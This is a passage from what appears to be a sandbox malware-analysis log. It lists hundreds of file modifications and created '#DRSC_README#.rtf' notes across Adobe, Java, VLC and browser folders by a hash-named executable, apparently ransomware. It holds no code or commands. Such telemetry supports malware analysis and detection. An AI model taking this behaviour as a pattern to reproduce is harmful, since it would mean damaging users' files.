(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforcomments_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\VERSION.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\rename.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\amd64\jvm.cfg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_field_grabber.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_share_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt-br_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected-hover.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\db\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jabswitch.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jconsole.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\standards_poster.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\az_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\virgo-new-folder.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_it_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmc.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File 